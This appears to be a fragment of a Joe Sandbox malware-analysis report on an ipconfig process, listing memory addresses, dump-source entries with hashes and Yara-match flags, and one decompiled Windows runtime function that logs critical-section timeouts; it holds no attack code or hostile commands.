                                                                                                                                                                                                                                                                                                                            0x03395dcb
                                                                                                                                                                                                                                                                                                                            0x03395dce
                                                                                                                                                                                                                                                                                                                            0x03395dd3
                                                                                                                                                                                                                                                                                                                            0x03395dd6
                                                                                                                                                                                                                                                                                                                            0x03395dd8
                                                                                                                                                                                                                                                                                                                            0x03395de6
                                                                                                                                                                                                                                                                                                                            0x03395dec
                                                                                                                                                                                                                                                                                                                            0x03395dee
                                                                                                                                                                                                                                                                                                                            0x03395df1
                                                                                                                                                                                                                                                                                                                            0x03395df3
                                                                                                                                                                                                                                                                                                                            0x0339635a
                                                                                                                                                                                                                                                                                                                            0x0339635a
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0339635a
                                                                                                                                                                                                                                                                                                                            0x03395dfe
                                                                                                                                                                                                                                                                                                                            0x03395e02
                                                                                                                                                                                                                                                                                                                            0x03395e05
                                                                                                                                                                                                                                                                                                                            0x03395e07
                                                                                                                                                                                                                                                                                                                            0x03395e10
                                                                                                                                                                                                                                                                                                                            0x03395e13
                                                                                                                                                                                                                                                                                                                            0x03395e1b
                                                                                                                                                                                                                                                                                                                            0x03395e1c
                                                                                                                                                                                                                                                                                                                            0x03395e21
                                                                                                                                                                                                                                                                                                                            0x03395e22
                                                                                                                                                                                                                                                                                                                            0x03395e23
                                                                                                                                                                                                                                                                                                                            0x03395e25
                                                                                                                                                                                                                                                                                                                            0x03395e2a
                                                                                                                                                                                                                                                                                                                            0x03395e2c
                                                                                                                                                                                                                                                                                                                            0x03395e2e
                                                                                                                                                                                                                                                                                                                            0x03395e36
                                                                                                                                                                                                                                                                                                                            0x03395e39
                                                                                                                                                                                                                                                                                                                            0x03395e42
                                                                                                                                                                                                                                                                                                                            0x03395e47
                                                                                                                                                                                                                                                                                                                            0x03395e4d
                                                                                                                                                                                                                                                                                                                            0x03395e54
                                                                                                                                                                                                                                                                                                                            0x03395e54
                                                                                                                                                                                                                                                                                                                            0x03395e54
                                                                                                                                                                                                                                                                                                                            0x03395e2e
                                                                                                                                                                                                                                                                                                                            0x03395e5c
                                                                                                                                                                                                                                                                                                                            0x03395e5f
                                                                                                                                                                                                                                                                                                                            0x03395e62
                                                                                                                                                                                                                                                                                                                            0x03395e64
                                                                                                                                                                                                                                                                                                                            0x03395e6b
                                                                                                                                                                                                                                                                                                                            0x03395e70
                                                                                                                                                                                                                                                                                                                            0x03395e7a
                                                                                                                                                                                                                                                                                                                            0x03395e7a
                                                                                                                                                                                                                                                                                                                            0x03395e7a
                                                                                                                                                                                                                                                                                                                            0x03395e6b
                                                                                                                                                                                                                                                                                                                            0x03395e7e
                                                                                                                                                                                                                                                                                                                            0x03395e7f
                                                                                                                                                                                                                                                                                                                            0x03395e7f
                                                                                                                                                                                                                                                                                                                            0x03395e81
                                                                                                                                                                                                                                                                                                                            0x03395e87
                                                                                                                                                                                                                                                                                                                            0x03395e8b
                                                                                                                                                                                                                                                                                                                            0x03395e8c
                                                                                                                                                                                                                                                                                                                            0x03395e8c
                                                                                                                                                                                                                                                                                                                            0x03395e8c
                                                                                                                                                                                                                                                                                                                            0x03395e9a
                                                                                                                                                                                                                                                                                                                            0x03395e9c
                                                                                                                                                                                                                                                                                                                            0x03395ea2
                                                                                                                                                                                                                                                                                                                            0x03395ea6
                                                                                                                                                                                                                                                                                                                            0x03395f50
                                                                                                                                                                                                                                                                                                                            0x03395f50
                                                                                                                                                                                                                                                                                                                            0x03395f57
                                                                                                                                                                                                                                                                                                                            0x03395f66
                                                                                                                                                                                                                                                                                                                            0x03395f66
                                                                                                                                                                                                                                                                                                                            0x03395f66
                                                                                                                                                                                                                                                                                                                            0x03395f68
                                                                                                                                                                                                                                                                                                                            0x03395f6a
                                                                                                                                                                                                                                                                                                                            0x033963d0
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x03395f70
                                                                                                                                                                                                                                                                                                                            0x03395f70
                                                                                                                                                                                                                                                                                                                            0x03395f91
                                                                                                                                                                                                                                                                                                                            0x03395f9c
                                                                                                                                                                                                                                                                                                                            0x03395f9e
                                                                                                                                                                                                                                                                                                                            0x03395fa4
                                                                                                                                                                                                                                                                                                                            0x03395fa6
                                                                                                                                                                                                                                                                                                                            0x0339638c
                                                                                                                                                                                                                                                                                                                            0x03396392
                                                                                                                                                                                                                                                                                                                            0x03396125
                                                                                                                                                                                                                                                                                                                            0x03396134
                                                                                                                                                                                                                                                                                                                            0x03396139
                                                                                                                                                                                                                                                                                                                            0x0339613f
                                                                                                                                                                                                                                                                                                                            0x03396146
                                                                                                                                                                                                                                                                                                                            0x03396148
                                                                                                                                                                                                                                                                                                                            0x0339614b
                                                                                                                                                                                                                                                                                                                            0x0339614d
                                                                                                                                                                                                                                                                                                                            0x0339614f
                                                                                                                                                                                                                                                                                                                            0x0339614f
                                                                                                                                                                                                                                                                                                                            0x0339614f
                                                                                                                                                                                                                                                                                                                            0x0339614f
                                                                                                                                                                                                                                                                                                                            0x03396153
                                                                                                                                                                                                                                                                                                                            0x03396159
                                                                                                                                                                                                                                                                                                                            0x03396159
                                                                                                                                                                                                                                                                                                                            0x0339615c
                                                                                                                                                                                                                                                                                                                            0x03396163
                                                                                                                                                                                                                                                                                                                            0x03396169
                                                                                                                                                                                                                                                                                                                            0x0339616c
                                                                                                                                                                                                                                                                                                                            0x03396172
                                                                                                                                                                                                                                                                                                                            0x03396181
                                                                                                                                                                                                                                                                                                                            0x03396186
                                                                                                                                                                                                                                                                                                                            0x03396187
                                                                                                                                                                                                                                                                                                                            0x0339618b
                                                                                                                                                                                                                                                                                                                            0x03396191
                                                                                                                                                                                                                                                                                                                            0x03396195
                                                                                                                                                                                                                                                                                                                            0x033961a3
                                                                                                                                                                                                                                                                                                                            0x033961bb
                                                                                                                                                                                                                                                                                                                            0x033961c0
                                                                                                                                                                                                                                                                                                                            0x033961c3
                                                                                                                                                                                                                                                                                                                            0x033961cc
                                                                                                                                                                                                                                                                                                                            0x033961d0
                                                                                                                                                                                                                                                                                                                            0x033961dc
                                                                                                                                                                                                                                                                                                                            0x033961de
                                                                                                                                                                                                                                                                                                                            0x033961e1
                                                                                                                                                                                                                                                                                                                            0x033961e4
                                                                                                                                                                                                                                                                                                                            0x033961e6
                                                                                                                                                                                                                                                                                                                            0x033961e8
                                                                                                                                                                                                                                                                                                                            0x033961e8
                                                                                                                                                                                                                                                                                                                            0x033961e8
                                                                                                                                                                                                                                                                                                                            0x033961e8
                                                                                                                                                                                                                                                                                                                            0x033961e6
                                                                                                                                                                                                                                                                                                                            0x033961ec
                                                                                                                                                                                                                                                                                                                            0x033961f3
                                                                                                                                                                                                                                                                                                                            0x03396203
                                                                                                                                                                                                                                                                                                                            0x03396209
                                                                                                                                                                                                                                                                                                                            0x0339620a
                                                                                                                                                                                                                                                                                                                            0x03396216
                                                                                                                                                                                                                                                                                                                            0x0339621d
                                                                                                                                                                                                                                                                                                                            0x03396227
                                                                                                                                                                                                                                                                                                                            0x03396241
                                                                                                                                                                                                                                                                                                                            0x03396246
                                                                                                                                                                                                                                                                                                                            0x0339624c
                                                                                                                                                                                                                                                                                                                            0x03396257
                                                                                                                                                                                                                                                                                                                            0x03396259
                                                                                                                                                                                                                                                                                                                            0x0339625c
                                                                                                                                                                                                                                                                                                                            0x0339625e
                                                                                                                                                                                                                                                                                                                            0x03396260
                                                                                                                                                                                                                                                                                                                            0x03396260
                                                                                                                                                                                                                                                                                                                            0x03396260
                                                                                                                                                                                                                                                                                                                            0x03396260
                                                                                                                                                                                                                                                                                                                            0x0339625e
                                                                                                                                                                                                                                                                                                                            0x03396264
                                                                                                                                                                                                                                                                                                                            0x03396267
                                                                                                                                                                                                                                                                                                                            0x03396269
                                                                                                                                                                                                                                                                                                                            0x03396315
                                                                                                                                                                                                                                                                                                                            0x03396315
                                                                                                                                                                                                                                                                                                                            0x0339631b
                                                                                                                                                                                                                                                                                                                            0x0339631e
                                                                                                                                                                                                                                                                                                                            0x03396324
                                                                                                                                                                                                                                                                                                                            0x03396327
                                                                                                                                                                                                                                                                                                                            0x0339632f
                                                                                                                                                                                                                                                                                                                            0x03396330
                                                                                                                                                                                                                                                                                                                            0x03396333
                                                                                                                                                                                                                                                                                                                            0x0339633a
                                                                                                                                                                                                                                                                                                                            0x0339633c
                                                                                                                                                                                                                                                                                                                            0x03396335
                                                                                                                                                                                                                                                                                                                            0x03396335
                                                                                                                                                                                                                                                                                                                            0x03396335
                                                                                                                                                                                                                                                                                                                            0x0339633f
                                                                                                                                                                                                                                                                                                                            0x03396342
                                                                                                                                                                                                                                                                                                                            0x0339634c
                                                                                                                                                                                                                                                                                                                            0x03396352
                                                                                                                                                                                                                                                                                                                            0x03396355
                                                                                                                                                                                                                                                                                                                            0x03395da9
                                                                                                                                                                                                                                                                                                                            0x03395dac
                                                                                                                                                                                                                                                                                                                            0x03395dae
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x03395db4
                                                                                                                                                                                                                                                                                                                            0x03395db4
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x03395db4
                                                                                                                                                                                                                                                                                                                            0x03395dae
                                                                                                                                                                                                                                                                                                                            0x03395d88
                                                                                                                                                                                                                                                                                                                            0x03395d8d
                                                                                                                                                                                                                                                                                                                            0x03396363
                                                                                                                                                                                                                                                                                                                            0x03396369
                                                                                                                                                                                                                                                                                                                            0x0339636a
                                                                                                                                                                                                                                                                                                                            0x03396370
                                                                                                                                                                                                                                                                                                                            0x03396372
                                                                                                                                                                                                                                                                                                                            0x0339637a
                                                                                                                                                                                                                                                                                                                            0x0339637b
                                                                                                                                                                                                                                                                                                                            0x0339637d
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0339637f
                                                                                                                                                                                                                                                                                                                            0x03396385
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x03396385
                                                                                                                                                                                                                                                                                                                            0x03395d38
                                                                                                                                                                                                                                                                                                                            0x03395d3b
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x03395d3b
                                                                                                                                                                                                                                                                                                                            0x03395d27
                                                                                                                                                                                                                                                                                                                            0x03395d29
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x03396360
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x03396360
                                                                                                                                                                                                                                                                                                                            0x03395c10
                                                                                                                                                                                                                                                                                                                            0x03395c10
                                                                                                                                                                                                                                                                                                                            0x033963da
                                                                                                                                                                                                                                                                                                                            0x033963e5
                                                                                                                                                                                                                                                                                                                            0x033963e5

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: df9f3601b1f257dde0f631f8e9e1caa4ab1cc8a8225b9e68e110c8b7a4ba130e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3083db22dd6410f88d8c4c1b58e8489afb8e74a00df039e0072237fe19ca2076
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df9f3601b1f257dde0f631f8e9e1caa4ab1cc8a8225b9e68e110c8b7a4ba130e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46426975D01229CFEB24CF68C881BA9F7B5FF49314F1881AAD84DAB252E7349985CF50
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8a2d7d2ca3e486df4bfd0acb9a1def1349dff3caff22cafc169b56ecd1b09023
                                                                                                                                                                                                                                                                                                                            • Instruction ID: acc15b125f713899c227cf97798cd7bf75f425f90e5b2f8e86d523aaab62e9d3
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a2d7d2ca3e486df4bfd0acb9a1def1349dff3caff22cafc169b56ecd1b09023
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55C01266B012144B97105948B8461F1F3BAE557377F946293DC0DB74029A63C82D05AB
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b6dbeed56dc71964d65b6c6ce43e63277262500c9ac8a32fcefae9652bb36e53
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 25ec7d2173e66ee071bef0d27e1919ae895eb61f07558fde9b0b7f052b1e90cf
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6dbeed56dc71964d65b6c6ce43e63277262500c9ac8a32fcefae9652bb36e53
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3DC08026B1A15016E317051D7C513B9F758C797130F0412D7D444F71418085C4D4515D
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                                                                                                            			E0335FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                                                                                                            				intOrPtr _t9;
                                                                                                                                                                                                                                                                                                                            				intOrPtr _t10;
                                                                                                                                                                                                                                                                                                                            				intOrPtr* _t12;
                                                                                                                                                                                                                                                                                                                            				intOrPtr* _t13;
                                                                                                                                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                                                                                                                                            				intOrPtr* _t15;
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				_t13 = __edx;
                                                                                                                                                                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                                                                                                                                                                            				_t14 =  *[fs:0x18];
                                                                                                                                                                                                                                                                                                                            				_t15 = _t12;
                                                                                                                                                                                                                                                                                                                            				_t7 = E0330CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                                                                                                                                                                                                                                                            				_push(_t13);
                                                                                                                                                                                                                                                                                                                            				E03355720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                                                                                                                                                                                                                                                            				_t9 =  *_t15;
                                                                                                                                                                                                                                                                                                                            				if(_t9 == 0xffffffff) {
                                                                                                                                                                                                                                                                                                                            					_t10 = 0;
                                                                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                                                                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                                                                            				_push(_t10);
                                                                                                                                                                                                                                                                                                                            				_push(_t15);
                                                                                                                                                                                                                                                                                                                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                                                                                                                                                                                                                                                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                                                                                                                                                                                                                                                            				return E03355720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0335FDFA
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0335FE2B
                                                                                                                                                                                                                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0335FE01
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                                                                                                                                                                                                                            • API String ID: 885266447-3903918235
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ab1fb3ce1eef82107082ddab034889d72cda4fdb6505bfa7cd271b259ad25220
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 04dbe0509157f2bbc0f3cb3effda96df760954c1dd2214e519bc12bed4220041
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab1fb3ce1eef82107082ddab034889d72cda4fdb6505bfa7cd271b259ad25220
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08F0F036640301BFEA209A45DC42F63BF6AEB45770F240314FA285A5E1EA62F86086F0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%